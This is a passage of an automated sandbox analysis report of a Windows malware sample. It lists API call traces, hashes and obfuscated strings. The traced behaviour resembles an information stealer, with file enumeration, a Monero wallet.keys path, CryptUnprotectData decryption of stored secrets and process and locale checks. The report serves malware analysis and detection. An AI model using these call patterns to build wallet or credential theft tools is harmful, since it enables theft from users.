                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: df5e93b72f799eaf2307e06d155f254e3bef496f1b45616f699343b241826154
                            • Instruction ID: 488c1c7a661c77fa18ece64b2b7c2f1a75d9248f6f77bdfb6dce25b819a16f5e
                            • Opcode Fuzzy Hash: df5e93b72f799eaf2307e06d155f254e3bef496f1b45616f699343b241826154
                            • Instruction Fuzzy Hash: D512207291011C9BCB19EB60DD96FEE73B8AF54304F4461ADA11A72091EF316F8ACF91
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00ED0C2E), ref: 00EBDE5E
                            • StrCmpCA.SHLWAPI(?,00ED14C8), ref: 00EBDEAE
                            • StrCmpCA.SHLWAPI(?,00ED14CC), ref: 00EBDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBE3E0
                            • FindClose.KERNEL32(000000FF), ref: 00EBE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 92bd333c2e539783fa7dbb04a31504c9d58b0bf23dd831cd3fc5e8c709fb07dd
                            • Instruction ID: 77c444f8efef75fff4bddd32a302c26265f93b83154d26d4878d10b6dc369b50
                            • Opcode Fuzzy Hash: 92bd333c2e539783fa7dbb04a31504c9d58b0bf23dd831cd3fc5e8c709fb07dd
                            • Instruction Fuzzy Hash: 12F1BC7291011C9BCB29EB60DD96FEE7378AF54304F4461AEA41A72091EE316F4BCF51
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00ED14B0,00ED0C2A), ref: 00EBDAEB
                            • StrCmpCA.SHLWAPI(?,00ED14B4), ref: 00EBDB33
                            • StrCmpCA.SHLWAPI(?,00ED14B8), ref: 00EBDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBDDCC
                            • FindClose.KERNEL32(000000FF), ref: 00EBDDDE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4fca3758ccdb6dee5465c0d51ea89f5b20270ef89499bd5da87ce9e31a306053
                            • Instruction ID: 50f3a149b85ce7a8aae0a98fab17331f9d7311fb245ae10ebec25d628a3518b5
                            • Opcode Fuzzy Hash: 4fca3758ccdb6dee5465c0d51ea89f5b20270ef89499bd5da87ce9e31a306053
                            • Instruction Fuzzy Hash: 6891597390010897CB14FF70ED5AEEE73BCAB84304F44556DF85AB6141EE359B1A8B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6_?$;3\v$GwG_$Qr_m$tI:x$|n&$7U&$|/7
                            • API String ID: 0-2565155610
                            • Opcode ID: 5a482773397d9040a9325e4edaea7592d1d6370ad0e5b5d29fd48270bd9319c6
                            • Instruction ID: 89360c6f0b5ada158372c612b05ae1e8596b39d0bfb2168b4088f68ab2148ba7
                            • Opcode Fuzzy Hash: 5a482773397d9040a9325e4edaea7592d1d6370ad0e5b5d29fd48270bd9319c6
                            • Instruction Fuzzy Hash: 8FB219F3A08210AFE304AE2DDC8577AB7D9EFD4720F1A853DEAC4C7744E67598058692
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: '1=S$F49$NrV$Sz%$W5$X"o$|Zk?$>vz
                            • API String ID: 0-2818733002
                            • Opcode ID: 2c210e00525e2fa10282bb719059415bff3b3a987de02118a40cf59ecf316d21
                            • Instruction ID: d6657965fb2b69e686500c6c771c15cf531de2f05be426be39dc3b706b8cf7b5
                            • Opcode Fuzzy Hash: 2c210e00525e2fa10282bb719059415bff3b3a987de02118a40cf59ecf316d21
                            • Instruction Fuzzy Hash: A9B2E8F360C200AFE3046E29EC8567AFBE9EF94720F16893DE6C4C7744E63598458796
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,00ED05AF), ref: 00EC7BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EC7BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EC7C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EC7C62
                            • LocalFree.KERNEL32(00000000), ref: 00EC7D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 08d6a01755ea966a68b413d39ddfd08fdbcd8f7d34b1373ebe70ad0a6c578d8f
                            • Instruction ID: 4dc63a5a35a9f41d0cbcd59a5a5d2c6ab93b7df9ea211d293b1e2c392fc23f46
                            • Opcode Fuzzy Hash: 08d6a01755ea966a68b413d39ddfd08fdbcd8f7d34b1373ebe70ad0a6c578d8f
                            • Instruction Fuzzy Hash: D741197194021CABDB24DB94DD99FEEB7B4FB48704F204199E40A72281DB752F86CFA1
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00ED0D73), ref: 00EBE4A2
                            • StrCmpCA.SHLWAPI(?,00ED14F8), ref: 00EBE4F2
                            • StrCmpCA.SHLWAPI(?,00ED14FC), ref: 00EBE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: a28b2fbfd190b2859827c6939b7a42ac2cc9c9fb1d97a086a92c2dc857205e6a
                            • Instruction ID: 6ebbbca6d5b3666615f71914b68ccfc886e9c4e5e8f8603420a35625c6089493
                            • Opcode Fuzzy Hash: a28b2fbfd190b2859827c6939b7a42ac2cc9c9fb1d97a086a92c2dc857205e6a
                            • Instruction Fuzzy Hash: C912333290011C9BDB18FB60DE9AFED73B9AB54304F4451BDB50A72181EE355F4ACB92
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Yqn$^o;3$eh^$n,M_$n,M_$})|_
                            • API String ID: 0-2021812280
                            • Opcode ID: cab380fe153cb34c9af4982a5150a4b6cff744b4bdbdf92359abc55e176f4842
                            • Instruction ID: 5248ecee268f03b51b37450038ffab239a07c84402112d1c6c8a8f5c9be3aaa5
                            • Opcode Fuzzy Hash: cab380fe153cb34c9af4982a5150a4b6cff744b4bdbdf92359abc55e176f4842
                            • Instruction Fuzzy Hash: D7B204F3A082109FE304AE2DDC8567ABBE5EF94720F16893DEAC5C7744EA3558018797
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9B2A
                            • LocalFree.KERNEL32(?,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N
                            • API String ID: 4291131564-1689755984
                            • Opcode ID: c22b96d6d2e543a2bb2dec20ca9df293f0eba7a06872d07fad170a24c3f78169
                            • Instruction ID: dc68e64a25689bf010720dad15d72b9b58e34820a5163a2b82453862aea3db0f
                            • Opcode Fuzzy Hash: c22b96d6d2e543a2bb2dec20ca9df293f0eba7a06872d07fad170a24c3f78169
                            • Instruction Fuzzy Hash: 9711A4B4240308EFEB10CF64D895FAA77B5FB89704F208058FA199B394C7B6A901CB54
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: bvm$n!pu$ox{$p=[$-vn
                            • API String ID: 0-1979976051
                            • Opcode ID: 2b65e8a980a50da1cd59e9b58303c5f2725b011d27e67c196516dbffb77e19ce
                            • Instruction ID: 7b825c2e8ec99175590bdf8a4485ff9f40e82b705f811a7af5bb1947984340d3
                            • Opcode Fuzzy Hash: 2b65e8a980a50da1cd59e9b58303c5f2725b011d27e67c196516dbffb77e19ce
                            • Instruction Fuzzy Hash: 96B21BF3A082049FE3046E2DEC8567AFBEAEBD4760F19863DE6C4C3744E93558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %N=h$;gZ6$yaw$}-o${
                            • API String ID: 0-2600014743
                            • Opcode ID: 2f4f5e244bd84ffc225940d0d6cb75570070766ffe4cbd4d82ff62e9316d76ab
                            • Instruction ID: 285378da51e7ef6f1efe5f5adcb5de262fa31ceb7fd21ee6d6a76860ba89143e
                            • Opcode Fuzzy Hash: 2f4f5e244bd84ffc225940d0d6cb75570070766ffe4cbd4d82ff62e9316d76ab
                            • Instruction Fuzzy Hash: 71B207F360C2049FE3086E2DEC8567ABBE9EF94720F16453EEAC5C3744E63558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %Y~$HW$\j6$op}$m~
                            • API String ID: 0-406133881
                            • Opcode ID: 959b8727ca057abb6ffdd5139f47130f8c39752ad13dabc6de5b881eddab21fc
                            • Instruction ID: d0ff27ceb56a4d667754e7ff784cbe6bf79d935e2ea3a9c1c424fc0ece8207e3
                            • Opcode Fuzzy Hash: 959b8727ca057abb6ffdd5139f47130f8c39752ad13dabc6de5b881eddab21fc
                            • Instruction Fuzzy Hash: A4B2F6F360C2009FE7046E29EC8567AFBE6EFD4720F1A893DE6C587744EA3558058693
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EBC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EBC87C
                            • lstrcat.KERNEL32(?,00ED0B46), ref: 00EBC943
                            • lstrcat.KERNEL32(?,00ED0B47), ref: 00EBC957
                            • lstrcat.KERNEL32(?,00ED0B4E), ref: 00EBC978
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 9163b39747e63829336e5db5de46c26a576e7f0bbce34dde337bafebb4ecf089
                            • Instruction ID: 14a00cb9229d462aab1a599e33c1cdf2a91ed2188a69319843a4895d8c298a3a
                            • Opcode Fuzzy Hash: 9163b39747e63829336e5db5de46c26a576e7f0bbce34dde337bafebb4ecf089
                            • Instruction Fuzzy Hash: D4416E7590820ADFDB20CF90DD89BFEB7B8BB88704F1041A9E509B7280D7755A85CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EB724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EB7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EB72A4
                            • LocalFree.KERNEL32(?), ref: 00EB72AE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 51089ac450ee2db880369687cd749a06a282bb657f0fa84456a7967f0d55f1d0
                            • Instruction ID: 9c440e30500736657ab1293ae143b79804a7d3bba3e56a259189b4abf026b90b
                            • Opcode Fuzzy Hash: 51089ac450ee2db880369687cd749a06a282bb657f0fa84456a7967f0d55f1d0
                            • Instruction Fuzzy Hash: 4E0140B5B40208FBDB20DBE4CD46F9E7778EB44704F104059FB49BB2C4C6B5AA018B64
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EC961E
                            • Process32First.KERNEL32(00ED0ACA,00000128), ref: 00EC9632
                            • Process32Next.KERNEL32(00ED0ACA,00000128), ref: 00EC9647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 00EC965C
                            • CloseHandle.KERNEL32(00ED0ACA), ref: 00EC967A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 29145f10177eab242d1586f48f4fbdce9023eaf7d141289f2cac3bc2d6f3d7db
                            • Instruction ID: e7418162ae063747794601c0146747c52f0bca1ad7ee4154768265b4dbf1af7b
                            • Opcode Fuzzy Hash: 29145f10177eab242d1586f48f4fbdce9023eaf7d141289f2cac3bc2d6f3d7db
